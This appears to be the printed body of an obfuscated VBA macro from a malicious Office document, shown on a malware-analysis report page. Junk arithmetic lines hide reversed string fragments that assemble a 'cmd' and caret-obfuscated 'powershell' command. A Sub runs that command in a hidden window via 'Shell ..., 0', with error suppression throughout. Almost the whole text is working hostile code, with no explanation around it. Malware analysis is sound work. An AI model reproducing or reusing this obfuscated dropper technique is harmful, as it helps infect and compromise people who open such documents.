LjicOucsi = KfTFUROtlBpTl - EjqYpJKLXbbN / (5402194 + iEiMiKXkMbhwu - 745460 + iLZRqowhiDBhw)
IjiuzoVPo = spjfijbpdC + Mid(StrReverse("9XNjnwFuwO3BaKZPkKRJ%!!%jwVcTNHwGbAUQQjGTcw1qvvYluL"), 23, 13)
HCFVD = kbITTPrsOGU - QBwlCkWDJhdZc / (4006151 + bHWtIMjoqiUiSn - 2202281 + bdPbcJDVZKOSD)
IujDrPz = jqwRQkrMLjhNFD - FDPztBvNtVRE / (182119 + wzQkswdjBX - 5228726 + OSiuPEAoTGwVJw)
iGwukmw = dFvwfqsNiRcMF - ZCsWwnd / (5928036 + GMEMArzubwJAbF - 4792758 + FWEAdmrvkuEGwL)
HQGqBKH = riGoYKhS + Mid(StrReverse("sZq Gc2OTZaC1atn9wVcTKawSSfEp% tesb4ADa6wAUO8PYUD"), 16, 17)
woPMJsX = jWBPvDwzTb - QYiVTUIcGnswP / (7640741 + CUPmTbfiRHlczh - 9293081 + nXSsmTkW)
fjdtnj = SBljqZmcz - dhjHRlq / (2553497 + hsIvJfFYw - 9032487 + iktUAZtw)
splTjYiaV = hzzCfTZGPBH - GVpZJGbDkAphlT / (8608885 + MGsrrmhhsGPqF - 9779938 + vnObOEvq)
fkznpEYI = LwGpmbdr + Mid(StrReverse("Jz0j0TO6HDrZG 1AwH2NTHh&lle^hs^=%NjwjicrFOX7qvR11jA"), 12, 17)
oVFZkSbEtCp = uIIQEUnHjDqk - lrutXrdjQQZYwv / (226618 + ZpDQTEAmWK - 1330419 + wOnchzFoPYt)
RuTna = wCisjsHZmk - OnUihqIX / (2422396 + CnBdzqzqMIAv - 6600459 + RaICiDhoMH)
POwpdHPQnKk = oNTXwGBhjt - cPmBHjabG / (3662324 + AMHiFsJ - 609745 + atEIcjSNB)
cvNhL = SvqjKSQMa + Mid(StrReverse("81JplmpowbsANdKPimCQkKRJ% tes&&WmQGUwVVXTzz"), 13, 11)
bZvcokVN = NGQPAIXjioiK - YbQMaGEHZKJ / (7979680 + POEBpszZPaCwA - 8114088 + RvNPimEUhAKvA)
wHRjiztQVi = nvGaLtJcdzq - DJBOOZQO / (7966941 + ztHCLuWAfww - 9588844 + ivXozhpSOZW)
mAIHV = uSTmlimmKwNT - hPFdTtMG / (6546995 + TqkTjzLjUk - 3728607 + bDOuSLLRf)
zwFAkcLlb = OwaCzsQcvwNkBF + Mid(StrReverse("VmVZQQjzqB1jpcrZFTT"), 5, 2)
kNoinrJM = vAKFmwPsipRoBO - aBuQrlmEEO / (3014380 + ooaqDfDStH - 1151014 + SQpVpwdiaU)
zfzwVOdWd = IiwEOJv - qWcaEIzN / (1694992 + vjSvVzavQPFlhv - 3907904 + RIHaoJzBPBqp)
wnGSRlhcEb = MqkUkiomNMwd - sjAFpjGVr / (8342465 + iJmiRfT - 1391646 + KDYUQzRjvDvJ)
DmsXKqJMJc = EfPRkpujKcMv + Mid(StrReverse("ranwi2UzZPQ2Tt79lNTj10Vhwq1wpoiQj0 !%NjwjisIV"), 4, 8)
EdtwlaIO = FVhsqtIoHfpsO - anvwlnUSQW / (1434407 + BviapdWZbaVCSD - 2526111 + JUUTwJphCiB)
nIUsGpzHzpO = XmFLlurNGhpL - pwzSsiharJ / (9140766 + nArGAXH - 5432620 + BoUKRYLzWbfI)
HMTmiRRHR = GLpPKETMfdJJzt - HGKijmn / (1969445 + HbGVaVhQspt - 6119981 + kNDIXVKLA)
cDARkiGVYli = VRQAJMKjPVwfma + Mid(StrReverse("XqWT7USWKawSSfEp%!&2dUq"), 5, 11)
AEjNiEQQ = HiwwlKwt - HAVqVzfaO / (3471922 + THHbKhFQTTiaiG - 5642114 + EKmLORkMipC)
TJwwRl = URwwABqAbWnDEf - zdZqjrSaQc / (1226898 + CXvzUfKwCUiZ - 5635458 + dDiXiHism)
uvwkm = FzSCBqiTuQod - ZSXtjWcuzMT / (2853205 + sttzCJkMs - 4111092 + IuLlOfMc)
DkkjY = iKsQRwZLSB + Mid(StrReverse("oXsp6Btwbabj9KVmO3zaFzmre^w^o^p=%jSw3OSboFUdS2S4"), 15, 11)
KFGvEhfBOi = HQGqBKH + DkkjY + cvNhL + fkznpEYI + cDARkiGVYli + IjiuzoVPo + zwFAkcLlb + DmsXKqJMJc
AXJFKNwVJ = FmwomwpavNisT - wLlpKqjTArOr / (6762063 + ilDnaXmiOUHNw - 7734017 + zzHDcIzcJLSH)
lmHZuPBrK = rRvuOzRh - uskAuHoHfiIucH / (3108177 + wGuNzvw - 4907100 + GpHhuCLbNYPBl)
NRFIVIBPO = ftRqWTzw - KLoRhZlfzSOjAw / (1980644 + cHpaoXZrfbncMo - 1509322 + aTraYAYij)
End Function

Attribute VB_Name = "ZuHFczuEVZXj"
Function CWZbpKCws()
On Error Resume Next
pwGcBjj = TmuDklGwwOBqRO - HpWjXmF / (9265088 + nSCucoXR - 8622946 + nFnlPNvnkhKJjF)
oNbcwvdO = BXMIbNNqiPRjMT - rkzUbwUD / (1264187 + bzUOCijzAb - 3254310 + JRjZPEWw)
zHbVWBJU = jUcqaLOduhT - mANsbfk / (6573910 + LsqjajkCjPhI - 8337284 + fsYcTUTFtwFXR)
kilCiuQiKfI = jwLzAUwIMirw + Mid(StrReverse("KkE           c/dwAwnstSJzOrDOIPvZtsAtnVFinTIFvnDHcj"), 37, 13)
GlCdts = idbLRmzvJiADDR - SFwtbCPPV / (9029236 + vswSDGOcorsuc - 1999199 + cHmfkVUC)
XRCmtahQXj = TdriwPOFQbq - wqfupac / (4272216 + LWjTaHcpKV - 5299055 + YzaOjfZcmdATD)
szFCr = RHlvusjAIHI - WHmQGGPOX / (8240304 + fJuCtmh - 4156533 + PupUDPajJ)
QaBvYLiCLKh = joYlPsYblJ + Mid(StrReverse("JGsXvSV   V/asbBFrzNUtumdTqqju"), 19, 5)
kEOiqAwYhMI = pIaCGlz - mOalszbRRMrff / (842941 + zmZsljDPLbLZlP - 3533578 + dbtXJRhNRiAYKf)
slRmfmGr = YlJbPjtOF - wPKhaqCzONEm / (6367554 + iELbDifEfMmob - 7655131 + QjNnoLC)
qlQUrrpSzz = jrrwZwSKmE - tLVSLWDtjz / (8931407 + OOwzirwsifhi - 6972604 + kGINCzkH)
QjMJZrK = rSGQJSqWWu + Mid(StrReverse("wAfOsnovDzaJMOdLaRUIoqYPztiGthwqoi   dhwqoi   daCRBvs"), 7, 18)
WQwqarzsSh = nToLpNdqizmwlW - uBGUFCMohHMNHs / (5916732 + AiJZjLYShNEj - 450638 + ojvirEWPWwb)
rcEnmnEKfwh = GDdzVwDRmSb - LicomrzdmDTfSc / (74751 + LkHNzEFUphr - 1150212 + ksVFzTJcidi)
RFSuMj = zrDkzhtwcFBKOz - dHzFArzB / (2195296 + aUJrwdHdOzNCkr - 9945531 + HDfqKqwLfUjXiH)
TKciNGBums = rvRCQlRSZmFdkc + Mid(StrReverse("MIsho  wqi ewqewqiegwq   iKrkVoATNrkzNotNimwcAQnVAHwijkOMD"), 33, 23)
mMhHUob = cuhzzubXHFB - tWVnjVzLdtjz / (1389987 + XKzVmOAYCwdrwR - 726374 + bRcXGTWzmrmuAi)
BaBML = isAWRZmT - iVUZJsXjIjSSW / (6918149 + DnziucFYTlvww - 8991524 + YpzoolwzquUG)
GkaZcsQpqN = UQsLIHTdbEYK - wAnOtYlVIcU / (6530691 + GFqHnaWTDDtkpq - 5337311 + wlZdLowK)
cZEsmS = prmWNjG + Mid(StrReverse("wzjMkASpSDLvnrTtjwuegwq   iuuqjwhh     dmcXAM"), 4, 24)
TWqPjCfX = TQwoJtztdDiJM - rvEkSGff / (7623231 + BBrPVGdpNVc - 4076037 + pBvAQwwNLEA)
kRVbfRwB = cZciHHocTnIBhX - asvrjWUOjX / (1149706 + hrRqzqTth - 115601 + GNosHCtt)
jPujXi = sbVUPNRZI - tLBsGlCw / (2080918 + Oipalodv - 5688167 + MpdnWGVw)
vbMEGnPijjv = AvURMnXdMAN + Mid(StrReverse("im      lXUnVwkvOUFFszacPJqhHiOYzifhZYk"), 32, 6)
zTKaRG = FiiEOmv - akWwvwDhOVAP / (1085803 + alVtSTqjHN - 4241637 + GHviIUaN)
vCkuNwo = zDzpZDNrAjszjH - jUTctrcIaorvmf / (2427482 + osWbiYDsPcrG - 6364255 + HXAwznAwTIX)
KMYXSOLj = WBhHaMoADHNjNL - bMQzWbwjT / (9198624 + fZjqYNEoBCLHB - 6095210 + haAKTkoWZ)
XzjhnzICk = jZtlXHvFVhH + Mid(StrReverse("IRASKvi          %cE^p^S^mo^C% zNU"), 4, 24)
wbzqR = izcZKOPFP - DuVjJcDrCH / (919390 + ECVaiwvOzD - 2559931 + RKrLiHJfo)
cUawarU = zYEnEjjoMMINv - EjfTKAUzhI / (2834934 + ksNuwYhPFzVurL - 5909286 + rAFEPRGu)
ubLVhiDwLa = pVnUwrwZGzr - ROjjfUHNlbz / (4167308 + IjCKjTlS - 3580609 + DtuHFZVl)
wcfoHiq = DJBSaUOMnjPT + Mid(StrReverse("YUiYSnHJYsD      &  odiMVPEidvOaNiY"), 13, 12)
CWZbpKCws = cZEsmS + TKciNGBums + QjMJZrK + wcfoHiq + XzjhnzICk + QaBvYLiCLKh + vbMEGnPijjv + kilCiuQiKfI
MmkZmVXjz = hqOWSLpKtOWjGI - GfnlMBoPpmiZiu / (6332743 + AVmlcthaiRvf - 1304615 + jjbafqkzk)
ztaZjjmGQ = cWKUXXNw - CvGIJZGC / (9506414 + OqBCkorB - 3812534 + rwKiSisVMEDSrY)
vprkRzchp = CVaUaffVtAUGkb - ijlptFvzdHuwH / (6915974 + VJGMbwEYuj - 4779337 + ZqDoEPumSrsw)
End Function
Sub BdRKTUaHLPzAvA(sojPBMKB As String)
On Error Resume Next
jbTtWjiIX = lQFkiGA - VuVjihuwYs / (6130286 + WIcjwXsnEAhtR - 3900131 + qADWEUp)
KVSzzmwZL = cjjdnZlHOMPUN - SKbDwUWbWhz / (1407019 + BaGpiprRk - 7741937 + DbSPqHZpIqi)
Shell sojPBMKB, 0
mKudqTBJw = jLjjHXlfVLh - zAUCGkOIIz / (4436637 + nwuAwXPapw - 4377316 + iijkoKmfz)
QKuJnMRuq = hoMtKckjwv - jDdEUYAd / (3876855 + NrZXlzrLKwfzZp - 5317122 + pYHDdnjqjH)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.